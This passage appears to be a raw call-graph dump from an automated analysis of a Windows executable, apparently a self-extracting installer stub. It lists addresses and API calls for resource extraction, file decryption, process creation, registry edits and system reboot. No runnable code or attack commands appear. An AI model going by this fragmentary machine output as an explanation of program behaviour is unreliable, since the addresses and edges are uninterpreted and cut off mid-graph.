PeekMessageA 2215->2216 2217 7ff737823be5 2215->2217 2216->2215 2220 7ff737823b99 2216->2220 2217->2188 2218 7ff737823ba7 DispatchMessageA 2219 7ff737823bb8 PeekMessageA 2218->2219 2219->2220 2220->2215 2220->2217 2220->2218 2220->2219 2221 7ff737825690 2222 7ff737823b40 4 API calls 2221->2222 2223 7ff7378256b1 2222->2223 2224 7ff7378256c2 WriteFile 2223->2224 2226 7ff7378256ba 2223->2226 2225 7ff7378256f9 2224->2225 2224->2226 2225->2226 2227 7ff737825725 SendDlgItemMessageA 2225->2227 2227->2226 2983 7ff7378278b0 2985 7ff7378278fd 2983->2985 2984 7ff737827ba8 CharPrevA 2986 7ff737827935 CreateFileA 2984->2986 2985->2984 2987 7ff73782797e 
WriteFile 2986->2987 2988 7ff737827970 2986->2988 2989 7ff7378279a2 CloseHandle 2987->2989 2991 7ff737828470 7 API calls 2988->2991 2989->2988 2992 7ff7378279d5 2991->2992 2993 7ff737824a30 2994 7ff737824a39 SendMessageA 2993->2994 2995 7ff737824a50 2993->2995 2994->2995 2996 7ff737823530 2997 7ff737823557 2996->2997 2998 7ff737823802 EndDialog 2996->2998 2999 7ff737823567 2997->2999 3000 7ff73782377e GetDesktopWindow 2997->3000 3006 7ff73782356b 2998->3006 3003 7ff73782357b 2999->3003 3004 7ff737823635 GetDlgItemTextA 2999->3004 2999->3006 3001 7ff737824c68 14 API calls 3000->3001 3002 7ff737823795 SetWindowTextA SendDlgItemMessageA 3001->3002 3005 7ff7378237d8 GetDlgItem EnableWindow 3002->3005 3002->3006 3007 7ff737823618 EndDialog 3003->3007 3008 7ff737823584 3003->3008 3014 7ff73782365e 3004->3014 3028 7ff7378236e9 3004->3028 3005->3006 3007->3006 3008->3006 3009 7ff737823591 LoadStringA 3008->3009 3010 7ff7378235de 3009->3010 3011 7ff7378235bd 3009->3011 3033 7ff737824a60 LoadLibraryA 3010->3033 3017 7ff737824dcc 24 API calls 3011->3017 3013 7ff737824dcc 24 API calls 3013->3006 3016 7ff737823694 GetFileAttributesA 3014->3016 3014->3028 3019 7ff7378236a8 3016->3019 3020 7ff7378236fa 3016->3020 3032 7ff7378235d7 3017->3032 3018 7ff7378235eb SetDlgItemTextA 3018->3006 3018->3011 3021 7ff737824dcc 24 API calls 3019->3021 3023 7ff737827ba8 CharPrevA 3020->3023 3024 7ff7378236cb 3021->3024 3022 7ff73782374b EndDialog 3022->3006 3025 7ff73782370e 3023->3025 3024->3006 3026 7ff7378236d4 CreateDirectoryA 3024->3026 3027 7ff737826b70 31 API calls 3025->3027 3026->3020 3026->3028 3029 7ff737823716 3027->3029 3028->3013 3029->3028 3030 7ff737823721 3029->3030 3031 7ff737826ca4 38 API calls 3030->3031 3030->3032 3031->3032 3032->3006 3032->3022 3034 7ff737824c20 3033->3034 3035 7ff737824aa0 GetProcAddress 3033->3035 3039 7ff737824dcc 24 API calls 3034->3039 3036 7ff737824c0a FreeLibrary 3035->3036 3037 7ff737824ac2 GetProcAddress 3035->3037 3036->3034 3037->3036 3038 
7ff737824ae2 GetProcAddress 3037->3038 3038->3036 3040 7ff737824b04 3038->3040 3041 7ff7378235e3 3039->3041 3042 7ff737824b13 GetTempPathA 3040->3042 3047 7ff737824b65 3040->3047 3041->3006 3041->3018 3043 7ff737824b2b 3042->3043 3043->3043 3044 7ff737824b34 CharPrevA 3043->3044 3046 7ff737824b4e CharPrevA 3044->3046 3044->3047 3045 7ff737824bee FreeLibrary 3045->3041 3046->3047 3047->3045 3048 7ff7378233f0 3049 7ff7378234ec 3048->3049 3050 7ff737823402 3048->3050 3051 7ff7378234f5 SendDlgItemMessageA 3049->3051 3054 7ff7378234e5 3049->3054 3053 7ff737823441 GetDesktopWindow 3050->3053 3056 7ff73782340f 3050->3056 3051->3054 3052 7ff737823430 EndDialog 3052->3054 3055 7ff737824c68 14 API calls 3053->3055 3057 7ff737823458 6 API calls 3055->3057 3056->3052 3056->3054 3057->3054 3058 7ff737825870 GlobalAlloc 3059 7ff7378280d0 3061 7ff7378280e2 3059->3061 3066 7ff737828818 GetModuleHandleW 3061->3066 3062 7ff737828149 __set_app_type 3063 7ff737828186 3062->3063 3064 7ff73782819c 3063->3064 3065 7ff73782818f __setusermatherr 3063->3065 3065->3064 3067 7ff73782882d 3066->3067 3067->3062 3068 7ff7378281b0 __getmainargs 3069 7ff737828b30 _XcptFilter 3070 7ff737828750 3071 7ff737828782 3070->3071 3072 7ff73782875f 3070->3072 3072->3071 3073 7ff73782877b ?terminate@ 3072->3073 3073->3071 3074 7ff737828790 SetUnhandledExceptionFilter 3075 7ff737828417 3076 7ff73782842f 3075->3076 3077 7ff737828426 _exit 3075->3077 3078 7ff737828438 _cexit 3076->3078 3079 7ff737828444 3076->3079 3077->3076 3078->3079 3080 7ff7378233a0 3081 7ff7378233bb CallWindowProcA 3080->3081 3082 7ff7378233ac 3080->3082 3083 7ff7378233b7 3081->3083 3082->3081 3082->3083 3084 7ff7378255e0 3085 7ff737825641 ReadFile 3084->3085 3086 7ff73782560d 3084->3086 3085->3086 3087 7ff7378257e0 3089 7ff73782581e 3087->3089 3090 7ff7378257fc 3087->3090 3088 7ff73782583d SetFilePointer 3088->3090 3089->3088 3089->3090 3091 7ff737823840 3092 7ff73782385a 3091->3092 3093 7ff737823852 3091->3093 3094 7ff7378238ec EndDialog 
3092->3094 3097 7ff73782385f 3092->3097 3093->3092 3095 7ff73782388e GetDesktopWindow 3093->3095 3094->3097 3096 7ff737824c68 14 API calls 3095->3096 3098 7ff7378238a5 SetWindowTextA SetDlgItemTextA SetForegroundWindow 3096->3098 3098->3097 3099 7ff737821500 3100 7ff737821557 GetDesktopWindow 3099->3100 3101 7ff737821530 3099->3101 3102 7ff737824c68 14 API calls 3100->3102 3103 7ff737821553 3101->3103 3104 7ff737821542 EndDialog 3101->3104 3105 7ff73782156e LoadStringA SetDlgItemTextA MessageBeep 3102->3105 3106 7ff737828470 7 API calls 3103->3106 3104->3103 3105->3103 3107 7ff7378215d0 3106->3107 2228 7ff737828200 2247 7ff737828964 2228->2247 2232 7ff73782824b 2233 7ff73782825d 2232->2233 2234 7ff737828277 Sleep 2232->2234 2235 7ff73782826d _amsg_exit 2233->2235 2237 7ff737828284 2233->2237 2234->2232 2235->2237 2236 7ff7378282fc _initterm 2238 7ff737828319 _IsNonwritableInCurrentImage 2236->2238 2237->2236 2237->2238 2246 7ff7378282dd 2237->2246 2239 7ff7378283f8 _ismbblead 2238->2239 2240 7ff73782837d 2238->2240 2238->2246 2239->2238 2251 7ff737822c54 GetVersion 2240->2251 2243 7ff7378283c7 exit 2244 7ff7378283cf 2243->2244 2245 7ff7378283d8 _cexit 2244->2245 2244->2246 2245->2246 2248 7ff737828990 6 API calls 2247->2248 2249 7ff737828209 GetStartupInfoW 2247->2249 2250 7ff737828a0f 2248->2250 2249->2232 2250->2249 2252 7ff737822c7b 2251->2252 2253 7ff737822cc3 2251->2253 2252->2253 2254 7ff737822c7f GetModuleHandleW 2252->2254 2275 7ff737822db4 2253->2275 2254->2253 2256 7ff737822c97 GetProcAddress 2254->2256 2256->2253 2258 7ff737822cb2 2256->2258 2258->2253 2259 7ff737822d7f 2261 7ff737822d97 2259->2261 2262 7ff737822d8b CloseHandle 2259->2262 2261->2243 2261->2244 2262->2261 2266 7ff737822d29 2266->2259 2267 7ff737822d5e 2266->2267 2268 7ff737822d33 2266->2268 2271 7ff737822d67 ExitWindowsEx 2267->2271 2272 7ff737822d7a 2267->2272 2270 7ff737824dcc 24 API calls 2268->2270 2273 7ff737822d59 2270->2273 2271->2259 2390 7ff737821c0c GetCurrentProcess 
OpenProcessToken 2272->2390 2273->2259 2273->2267 2276 7ff737828b09 2275->2276 2277 7ff737822df9 memset memset 2276->2277 2398 7ff737825050 FindResourceExA SizeofResource 2277->2398 2280 7ff737822e53 CreateEventA SetEvent 2281 7ff737825050 7 API calls 2280->2281 2285 7ff737822e92 2281->2285 2282 7ff737824dcc 24 API calls 2284 7ff737822fd9 2282->2284 2283 7ff737822e96 2290 7ff737824dcc 24 API calls 2283->2290 2287 7ff737828470 7 API calls 2284->2287 2285->2283 2286 7ff737822ed5 2285->2286 2288 7ff737822fa3 2285->2288 2289 7ff737825050 7 API calls 2286->2289 2291 7ff737822cd4 2287->2291 2403 7ff7378270a8 2288->2403 2293 7ff737822eec 2289->2293 2294 7ff737822eb4 2290->2294 2291->2259 2321 7ff7378230ec 2291->2321 2293->2283 2296 7ff737822efe CreateMutexA 2293->2296 2294->2284 2296->2288 2299 7ff737822f22 GetLastError 2296->2299 2297 7ff737822fc4 2300 7ff737822fde FindResourceExA 2297->2300 2301 7ff737822fcd 2297->2301 2298 7ff737822fb5 2298->2282 2299->2288 2302 7ff737822f35 2299->2302 2304 7ff737822fff LoadResource 2300->2304 2305 7ff737823014 2300->2305 2430 7ff73782204c 2301->2430 2306 7ff737822f4a 2302->2306 2307 7ff737822f62 2302->2307 2304->2305 2309 7ff737823029 2305->2309 2310 7ff73782301d #17 2305->2310 2308 7ff737824dcc 24 API calls 2306->2308 2311 7ff737824dcc 24 API calls 2307->2311 2312 7ff737822f60 2308->2312 2309->2284 2313 7ff73782303a 2309->2313 2310->2309 2314 7ff737822f7c 2311->2314 2315 7ff737822f81 CloseHandle 2312->2315 2445 7ff737823bf4 GetVersionExA 2313->2445 2314->2288 2314->2315 2315->2284 2320 7ff737827ac8 28 API calls 2320->2294 2322 7ff737823139 2321->2322 2323 7ff737823116 2321->2323 2362 7ff737823236 2322->2362 2575 7ff737825fe4 2322->2575 2325 7ff737823123 2323->2325 2535 7ff7378260a4 2323->2535 2325->2322 2325->2362 2555 7ff737823f74 2325->2555 2331 7ff737828470 7 API calls 2333 7ff737822ce1 2331->2333 2332 7ff73782315b GetSystemDirectoryA 2334 7ff737827ba8 CharPrevA 2332->2334 2365 7ff7378261ec 2333->2365 2335 7ff737823186 
LoadLibraryA 2334->2335 2336 7ff7378231c9 FreeLibrary 2335->2336 2337 7ff73782319f GetProcAddress 2335->2337 2338 7ff7378231e4 2336->2338 2339 7ff737823273 SetCurrentDirectoryA 2336->2339 2337->2336 2340 7ff7378231ba DecryptFileA 2337->2340 2338->2339 2343 7ff7378231f0 GetWindowsDirectoryA 2338->2343 2341 7ff73782320d 2339->2341 2342 7ff737823291 2339->2342 2340->2336 2345 7ff737824dcc 24 API calls 2341->2345 2351 7ff7378232fb 2342->2351 2354 7ff7378232cb 2342->2354 2364 7ff73782331f 2342->2364 2343->2341 2344 7ff73782325a 2343->2344 2638 7ff737826ca4 GetCurrentDirectoryA SetCurrentDirectoryA 2344->2638 2347 7ff73782322b 2345->2347 2733 7ff737827700 GetLastError 2347->2733 2348 7ff737823347 2353 7ff737823368 2348->2353 2687 7ff7378240c4 2348->2687 2350 7ff737822318 18 API calls 2350->2348 2665 7ff737825d90 2351->2665 2357 7ff737823383 2353->2357 2353->2362 2358 7ff737827ac8 28 API calls 2354->2358 2355 7ff737823230 2355->2362 2744 7ff73782494c 2357->2744 2359 7ff7378232f6 2358->2359 2359->2362 2734 7ff73782772c 2359->2734 2362->2331 2364->2348 2364->2350 2364->2362 2367 7ff737826214 2365->2367 2366 7ff73782624c LocalFree LocalFree 2366->2367 2367->2366 2369 7ff737826229 SetFileAttributesA DeleteFileA 2367->2369 2375 7ff737826273 2367->2375 2368 7ff737826311 2370 7ff737826387 2368->2370 2372 7ff73782632d RegOpenKeyExA 2368->2372 2369->2366 2371 7ff737828470 7 API calls 2370->2371 2373 7ff737822ce8 2371->2373 2372->2370 2374 7ff73782635e RegDeleteValueA RegCloseKey 2372->2374 2373->2259 2373->2266 2379 7ff737822318 2373->2379 2374->2370 2375->2368 2376 7ff7378262f4 SetCurrentDirectoryA 2375->2376 2377 7ff737827c40 4 API calls 2375->2377 2378 7ff73782204c 16 API calls 2376->2378 2377->2376 2378->2368 2380 7ff737822447 2379->2380 2381 7ff737822330 2379->2381 2975 7ff737822244 GetWindowsDirectoryA 2380->2975 2382 7ff73782233a 2381->2382 2383 7ff7378223cb RegOpenKeyExA 2381->2383 2385 7ff7378223c3 2382->2385 2387 7ff73782234a RegOpenKeyExA 2382->2387 2383->2385 2386 
7ff7378223fe RegQueryInfoKeyA 2383->2386 2385->2266 2388 7ff7378223a8 RegCloseKey 2386->2388 2387->2385 2389 7ff73782237d RegQueryValueExA 2387->2389 2388->2385 2389->2388 2391 7ff737821c6f LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2390->2391 2393 7ff737821c4c 2390->2393 2392 7ff737821cec ExitWindowsEx 2391->2392 2391->2393 2392->2393 2394 7ff737821c68 2392->2394 2395 7ff737824dcc 24 API calls 2393->2395 2396 7ff737828470 7 API calls 2394->2396 2395->2394 2397 7ff737821d1a 2396->2397 2397->2259 2399 7ff737822e43 2398->2399 2400 7ff73782509b 2398->2400 2399->2280 2399->2298 2400->2399 2401 7ff7378250a4 FindResourceA LoadResource LockResource 2400->2401 2401->2399 2402 7ff7378250e3 memcpy_s FreeResource 2401->2402 2402->2399 2404 7ff737827566 2403->2404 2428 7ff7378270f2 2403->2428 2405 7ff737828470 7 API calls 2404->2405 2407 7ff737822fb1 2405->2407 2406 7ff7378271ca 2406->2404 2409 7ff7378271e7 GetModuleFileNameA 2406->2409 2407->2297 2407->2298 2408 7ff73782711d CharNextA 2408->2428 2410 7ff73782721c 2409->2410 2411 7ff73782720f 2409->2411 2410->2404 2479 7ff737827d68 2411->2479 2413 7ff7378276f1 2488 7ff737828648 RtlCaptureContext RtlLookupFunctionEntry 2413->2488 2416 7ff737827238 CharUpperA 2417 7ff73782766f 2416->2417 2416->2428 2418 7ff737824dcc 24 API calls 2417->2418 2419 7ff737827692 2418->2419 2420 7ff7378276aa ExitProcess 2419->2420 2421 7ff73782769e CloseHandle 2419->2421 2421->2420 2422 7ff73782739d CharUpperA 2422->2428 2423 7ff737827346 CompareStringA 2423->2428 2424 7ff7378273fb CharUpperA 2424->2428 2425 7ff737827492 CharUpperA 2425->2428 2426 7ff7378272d0 CharUpperA 2426->2428 2427 7ff737827ce8 IsDBCSLeadByte CharNextA 2427->2428 2428->2404 2428->2406 2428->2408 2428->2413 2428->2416 2428->2422 2428->2423 2428->2424 2428->2425 2428->2426 2428->2427 2484 7ff737827ba8 2428->2484 2431 7ff737822213 2430->2431 2432 7ff737822086 2430->2432 2433 7ff737828470 7 API calls 2431->2433 2435 7ff7378220dc FindFirstFileA 2432->2435 2434 
7ff737822222 2433->2434 2434->2284 2435->2431 2443 7ff7378220fe 2435->2443 2436 7ff737822138 lstrcmpA 2438 7ff737822158 lstrcmpA 2436->2438 2439 7ff7378221d9 FindNextFileA 2436->2439 2437 7ff7378221a3 2440 7ff7378221b4 SetFileAttributesA DeleteFileA 2437->2440 2438->2439 2438->2443 2441 7ff7378221f5 FindClose RemoveDirectoryA 2439->2441 2439->2443 2440->2439 2441->2431 2442 7ff737827ba8 CharPrevA 2442->2443 2443->2436 2443->2437 2443->2439 2443->2442 2444 7ff73782204c 8 API calls 2443->2444 2444->2443 2450 7ff737823c59 2445->2450 2452 7ff737823c4f 2445->2452 2446 7ff737824dcc 24 API calls 2447 7ff737823f05 2446->2447 2448 7ff737828470 7 API calls 2447->2448 2449 7ff737823042 2448->2449 2449->2284 2460 7ff7378212ec 2449->2460 2450->2447 2450->2452 2453 7ff737823db1 2450->2453 2494 7ff737822834 2450->2494 2452->2446 2452->2447 2453->2447 2453->2452 2454 7ff737823eb7 MessageBeep 2453->2454 2455 7ff737827f04 13 API calls 2454->2455 2456 7ff737823eca 2455->2456 2457 7ff737823ed3 MessageBoxA 2456->2457 2458 7ff737827e34 2 API calls 2456->2458 2457->2447 2458->2457 2461 7ff73782133c 2460->2461 2462 7ff7378214b5 2460->2462 2526 7ff7378211cc LoadLibraryA 2461->2526 2464 7ff737828470 7 API calls 2462->2464 2466 7ff7378214da 2464->2466 2466->2284 2466->2320 2467 7ff73782134d GetCurrentProcess OpenProcessToken 2467->2462 2468 7ff737821377 GetTokenInformation 2467->2468 2469 7ff7378214a0 CloseHandle 2468->2469 2470 7ff7378213a0 GetLastError 2468->2470 2469->2462 2470->2469 2471 7ff7378213b5 LocalAlloc 2470->2471 2471->2469 2472 7ff7378213d2 GetTokenInformation 2471->2472 2473 7ff7378213fc AllocateAndInitializeSid 2472->2473 2474 7ff737821491 LocalFree 2472->2474 2473->2474 2478 7ff737821445 2473->2478 2474->2469 2475 7ff737821481 FreeSid 2475->2474 2476 7ff737821452 EqualSid 2477 7ff737821476 2476->2477 2476->2478 2477->2475 2478->2475 2478->2476 2478->2477 2480 7ff737827d88 2479->2480 2481 7ff737827dd9 2479->2481 2482 7ff737827d90 IsDBCSLeadByte 2480->2482 2483 7ff737827db6 
CharNextA 2480->2483 2481->2410 2482->2480 2483->2480 2483->2481 2485 7ff737827bc8 2484->2485 2485->2485 2486 7ff737827bec CharPrevA 2485->2486 2487 7ff737827bda 2485->2487 2486->2487 2487->2428 2489 7ff7378286c7 2488->2489 2490 7ff737828685 RtlVirtualUnwind 2488->2490 2493 7ff737828494 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2489->2493 2490->2489 2495 7ff737822a2f 2494->2495 2505 7ff737822872 2494->2505 2497 7ff737822a50 2495->2497 2498 7ff737822a41 GlobalFree 2495->2498 2497->2453 2498->2497 2499 7ff7378228a5 GetFileVersionInfoSizeA 2500 7ff7378228c2 GlobalAlloc 2499->2500 2499->2505 2500->2495 2501 7ff7378228e1 GlobalLock 2500->2501 2501->2495 2502 7ff7378228fc GetFileVersionInfoA 2501->2502 2503 7ff737822920 VerQueryValueA 2502->2503 2502->2505 2504 7ff7378229ed GlobalUnlock 2503->2504 2503->2505 2504->2505 2505->2495 2505->2499 2505->2504 2506 7ff7378229d9 GlobalUnlock 2505->2506 2507 7ff73782261c 2505->2507 2506->2495 2508 7ff73782265b CharUpperA CharNextA CharNextA 2507->2508 2509 7ff7378227e0 GetSystemDirectoryA 2507->2509 2511 7ff73782269c 2508->2511 2512 7ff7378227dd 2508->2512 2510 7ff7378227f1 2509->2510 2513 7ff737822805 2510->2513 2516 7ff737827ba8 CharPrevA 2510->2516 2514 7ff7378227c7 GetWindowsDirectoryA 2511->2514 2515 7ff7378226a6 2511->2515 2512->2509 2517 7ff737828470 7 API calls 2513->2517 2514->2510 2519 7ff737827ba8 CharPrevA 2515->2519 2516->2513 2518 7ff737822814 2517->2518 2518->2505 2520 7ff737822705 RegOpenKeyExA 2519->2520 2520->2510 2521 7ff737822738 RegQueryValueExA 2520->2521 2522 7ff73782276b 2521->2522 2523 7ff7378227b4 RegCloseKey 2521->2523 2524 7ff737822774 ExpandEnvironmentStringsA 2522->2524 2525 7ff737822792 2522->2525 2523->2510 2524->2525 2525->2523 2527 7ff7378212bb 2526->2527 2528 7ff737821221 GetProcAddress 2526->2528 2531 7ff737828470 7 API calls 2527->2531 2529 7ff7378212ac FreeLibrary 2528->2529 2530 7ff73782123f AllocateAndInitializeSid 2528->2530 2529->2527 2530->2529 
2532 7ff737821288 FreeSid 2530->2532 2533 7ff7378212ca 2531->2533 2532->2529 2533->2462 2533->2467 2536 7ff737825050 7 API calls 2535->2536 2537 7ff7378260bf LocalAlloc 2536->2537 2538 7ff73782610b 2537->2538 2539 7ff7378260dd 2537->2539 2541 7ff737825050 7 API calls 2538->2541 2540 7ff737824dcc 24 API calls 2539->2540 2542 7ff7378260fb 2540->2542 2543 7ff73782611d 2541->2543 2757 7ff737827700 GetLastError 2542->2757 2545 7ff73782615a lstrcmpA 2543->2545 2546 7ff737826121 2543->2546 2547 7ff73782618a 2545->2547 2548 7ff737826174 LocalFree 2545->2548 2549 7ff737824dcc 24 API calls 2546->2549 2551 7ff737824dcc 24 API calls 2547->2551 2550 7ff737826183 2548->2550 2552 7ff73782613f LocalFree 2549->2552 2550->2325 2553 7ff7378261ac LocalFree 2551->2553 2552->2550 2554 7ff737826100 2553->2554 2554->2550 2556 7ff737825050 7 API calls 2555->2556 2557 7ff737823f8b LocalAlloc 2556->2557 2558 7ff737823fdd 2557->2558 2559 7ff737823fad 2557->2559 2560 7ff737825050 7 API calls 2558->2560 2561 7ff737824dcc 24 API calls 2559->2561 2562 7ff737823fef 2560->2562 2563 7ff737823fcb 2561->2563 2564 7ff737824030 lstrcmpA 2562->2564 2565 7ff737823ff3 2562->2565 2758 7ff737827700 GetLastError 2563->2758 2568 7ff737824098 LocalFree 2564->2568 2569 7ff73782404e 2564->2569 2567 7ff737824dcc 24 API calls 2565->2567 2571 7ff737824011 LocalFree 2567->2571 2573 7ff737823fd6 2568->2573 2572 7ff737827ac8 28 API calls 2569->2572 2570 7ff737823fd0 2570->2573 2571->2573 2574 7ff73782406e LocalFree 2572->2574 2573->2322 2574->2573 2576 7ff737825050 7 API calls 2575->2576 2577 7ff737826001 2576->2577 2578 7ff737826006 2577->2578 2579 7ff73782604a 2577->2579 2581 7ff737824dcc 24 API calls 2578->2581 2580 7ff737825050 7 API calls 2579->2580 2582 7ff737826063 2580->2582 2588 7ff737826025 2581->2588 2583 7ff73782772c 13 API calls 2582->2583 2585 7ff73782606f 2583->2585 2584 7ff737823146 2584->2362 2589 7ff7378266c4 2584->2589 2585->2584 2586 7ff737826073 2585->2586 2587 7ff737824dcc 24 API calls 2586->2587 
2587->2588 2588->2584 2590 7ff737825050 7 API calls 2589->2590 2591 7ff737826706 LocalAlloc 2590->2591 2592 7ff737826756 2591->2592 2593 7ff737826726 2591->2593 2595 7ff737825050 7 API calls 2592->2595 2594 7ff737824dcc 24 API calls 2593->2594 2596 7ff737826744 2594->2596 2597 7ff737826768 2595->2597 2783 7ff737827700 GetLastError 2596->2783 2598 7ff73782676c 2597->2598 2599 7ff7378267a5 lstrcmpA LocalFree 2597->2599 2601 7ff737824dcc 24 API calls 2598->2601 2602 7ff737826837 2599->2602 2603 7ff7378267ec 2599->2603 2605 7ff73782678a LocalFree 2601->2605 2607 7ff737826b14 2602->2607 2609 7ff73782684f GetTempPathA 2602->2609 2612 7ff7378264e4 53 API calls 2603->2612 2604 7ff737826749 2606 7ff73782674f 2604->2606 2605->2606 2610 7ff737828470 7 API calls 2606->2610 2608 7ff737827ac8 28 API calls 2607->2608 2608->2606 2611 7ff737826872 2609->2611 2619 7ff7378268a5 2609->2619 2613 7ff737823153 2610->2613 2759 7ff7378264e4 2611->2759 2615 7ff73782680c 2612->2615 2613->2332 2613->2362 2615->2606 2617 7ff737826814 2615->2617 2618 7ff737824dcc 24 API calls 2617->2618 2618->2604 2619->2606 2621 7ff7378268f9 GetDriveTypeA 2619->2621 2622 7ff737826adb GetWindowsDirectoryA 2619->2622 2623 7ff737826916 GetFileAttributesA 2621->2623 2631 7ff737826911 2621->2631 2625 7ff737826ca4 38 API calls 2622->2625 2623->2631 2625->2619 2626 7ff7378264e4 53 API calls 2626->2619 2627 7ff737826ca4 38 API calls 2627->2631 2628 7ff737826955 GetDiskFreeSpaceA 2630 7ff737826983 MulDiv 2628->2630 2628->2631 2629 7ff737822468 25 API calls 2629->2631 2630->2631 2631->2606 2631->2621 2631->2622 2631->2623 2631->2627 2631->2628 2631->2629 2632 7ff737826a02 GetWindowsDirectoryA 2631->2632 2633 7ff737827ba8 CharPrevA 2631->2633 2636 7ff737826a6d SetFileAttributesA 2631->2636 2637 7ff7378264e4 53 API calls 2631->2637 2632->2631 2634 7ff737826a2a GetFileAttributesA 2633->2634 2634->2631 2635 7ff737826a40 CreateDirectoryA 2634->2635 2635->2631 2636->2631 2637->2631 2639 7ff737826d3f GetDiskFreeSpaceA 
2638->2639 2640 7ff737826d12 2638->2640 2642 7ff737826d80 MulDiv 2639->2642 2643 7ff737826f63 memset 2639->2643 2641 7ff737824dcc 24 API calls 2640->2641 2644 7ff737826d2f 2641->2644 2642->2643 2646 7ff737826dae GetVolumeInformationA 2642->2646 2834 7ff737827700 GetLastError 2643->2834 2815 7ff737827700 GetLastError 2644->2815 2649 7ff737826de6 memset 2646->2649 2650 7ff737826e45 SetCurrentDirectoryA 2646->2650 2648 7ff737826f7b GetLastError FormatMessageA 2652 7ff737826fbd 2648->2652 2816 7ff737827700 GetLastError 2649->2816 2654 7ff737826e6c 2650->2654 2651 7ff737826d34 2655 7ff737826f41 2651->2655 2656 7ff737824dcc 24 API calls 2652->2656 2661 7ff737826eb4 2654->2661 2663 7ff737826ed8 2654->2663 2659 7ff737828470 7 API calls 2655->2659 2658 7ff737826fd8 SetCurrentDirectoryA 2656->2658 2657 7ff737826dfe GetLastError FormatMessageA 2657->2652 2658->2655 2660 7ff73782326f 2659->2660 2660->2339 2660->2362 2662 7ff737824dcc 24 API calls 2661->2662 2662->2651 2663->2655 2817 7ff7378224f8 2663->2817 2666 7ff737825050 7 API calls 2665->2666 2667 7ff737825dab FindResourceA LoadResource LockResource 2666->2667 2668 7ff737825dfc 2667->2668 2684 7ff737825fcf 2667->2684 2669 7ff737825e08 GetDlgItem ShowWindow GetDlgItem ShowWindow 2668->2669 2670 7ff737825e56 2668->2670 2669->2670 2835 7ff737825c60 #20 2670->2835 2673 7ff737825e69 #20 2674 7ff737825e5f 2673->2674 2675 7ff737825ed1 #22 2673->2675 2678 7ff737824dcc 24 API calls 2674->2678 2676 7ff737825f55 2675->2676 2677 7ff737825f15 #23 2675->2677 2680 7ff737825f61 FreeResource 2676->2680 2681 7ff737825f75 2676->2681 2677->2674 2677->2676 2679 7ff737825f53 2678->2679 2679->2676 2680->2681 2682 7ff737825f9f 2681->2682 2683 7ff737825f81 2681->2683 2682->2684 2686 7ff737825fb1 SendMessageA 2682->2686 2685 7ff737824dcc 24 API calls 2683->2685 2684->2359 2685->2682 2686->2684 2688 7ff737824118 2687->2688 2707 7ff73782412f 2687->2707 2689 7ff737825050 7 API calls 2688->2689 2689->2707 2690 7ff737824145 memset 2690->2707 2691 
7ff737824254 2692 7ff737824dcc 24 API calls 2691->2692 2693 7ff737824273 2692->2693 2694 7ff7378244ee 2693->2694 2696 7ff737828470 7 API calls 2694->2696 2697 7ff7378244ff 2696->2697 2697->2353 2698 7ff7378245d8 2698->2694 2700 7ff7378245f2 RegOpenKeyExA 2698->2700 2699 7ff7378242f5 CompareStringA 2699->2698 2699->2707 2700->2694 2704 7ff737824627 RegQueryValueExA 2700->2704 2701 7ff737824599 2703 7ff737824dcc 24 API calls 2701->2703 2702 7ff7378244df LocalFree 2702->2694 2708 7ff7378245b8 LocalFree 2703->2708 2710 7ff73782471c RegCloseKey 2704->2710 2711 7ff73782466c memset GetSystemDirectoryA 2704->2711 2705 7ff737825050 7 API calls 2705->2707 2707->2690 2707->2691 2707->2694 2707->2698 2707->2699 2707->2701 2707->2702 2707->2705 2712 7ff7378244ad LocalFree 2707->2712 2715 7ff7378241fd CompareStringA 2707->2715 2730 7ff737824394 2707->2730 2847 7ff737821684 2707->2847 2886 7ff737821d28 memset memset RegCreateKeyExA 2707->2886 2913 7ff73782473c CreateProcessA 2707->2913 2708->2694 2710->2694 2713 7ff73782469d 2711->2713 2714 7ff7378246b3 2711->2714 2712->2698 2712->2707 2717 7ff737827ba8 CharPrevA 2713->2717 2718 7ff73782114c _vsnprintf 2714->2718 2715->2707 2717->2714 2719 7ff7378246dc RegSetValueExA 2718->2719 2719->2710 2720 7ff737824574 2722 7ff737824dcc 24 API calls 2720->2722 2721 7ff7378243a5 GetProcAddress 2723 7ff737824521 2721->2723 2721->2730 2725 7ff737824597 2722->2725 2726 7ff737824dcc 24 API calls 2723->2726 2727 7ff737824553 LocalFree 2725->2727 2728 7ff737824544 FreeLibrary 2726->2728 2938 7ff737827700 GetLastError 2727->2938 2728->2727 2730->2720 2730->2721 2731 7ff737824480 FreeLibrary 2730->2731 2732 7ff7378244d3 FreeLibrary 2730->2732 2928 7ff7378279f0 2730->2928 2731->2712 2732->2702 2733->2355 2741 7ff73782778a 2734->2741 2735 7ff73782114c _vsnprintf 2736 7ff7378277df FindResourceA 2735->2736 2737 7ff73782775e LoadResource LockResource 2736->2737 2738 7ff737827801 2736->2738 2737->2738 2737->2741 2739 7ff737828470 7 API calls 2738->2739 2740 
7ff73782782e 2739->2740 2740->2364 2741->2735 2742 7ff7378277b8 FreeResource 2741->2742 2743 7ff737827803 FreeResource 2741->2743 2742->2741 2743->2738 2745 7ff737825050 7 API calls 2744->2745 2746 7ff737824967 LocalAlloc 2745->2746 2747 7ff7378249a9 2746->2747 2748 7ff737824989 2746->2748 2750 7ff737825050 7 API calls 2747->2750 2749 7ff737824dcc 24 API calls 2748->2749 2751 7ff7378249a7 2749->2751 2752 7ff7378249bb 2750->2752 2751->2362 2753 7ff7378249d5 lstrcmpA 2752->2753 2755 7ff7378249bf 2752->2755 2754 7ff737824a0e LocalFree 2753->2754 2753->2755 2754->2751 2756 7ff737824dcc 24 API calls 2755->2756 2756->2754 2757->2554 2758->2570 2760 7ff7378265dd 2759->2760 2761 7ff737826516 2759->2761 2801 7ff737826b70 2760->2801 2790 7ff7378263b8 2761->2790 2765 7ff737828470 7 API calls 2769 7ff7378266a8 2765->2769 2767 7ff737826577 GetSystemInfo 2779 7ff737826591 2767->2779 2768 7ff7378265cc 2775 7ff737827ba8 CharPrevA 2768->2775 2769->2606 2784 7ff737822468 GetWindowsDirectoryA 2769->2784 2770 7ff73782662a CreateDirectoryA 2771 7ff73782667d 2770->2771 2772 7ff73782663f 2770->2772 2813 7ff737827700 GetLastError 2771->2813 2774 7ff737826649 2772->2774 2773 7ff737826688 2773->2765 2774->2773 2777 7ff737826ca4 38 API calls 2774->2777 2775->2760 2781 7ff73782665a 2777->2781 2778 7ff737826682 2778->2773 2779->2768 2780 7ff737827ba8 CharPrevA 2779->2780 2780->2768 2781->2773 2782 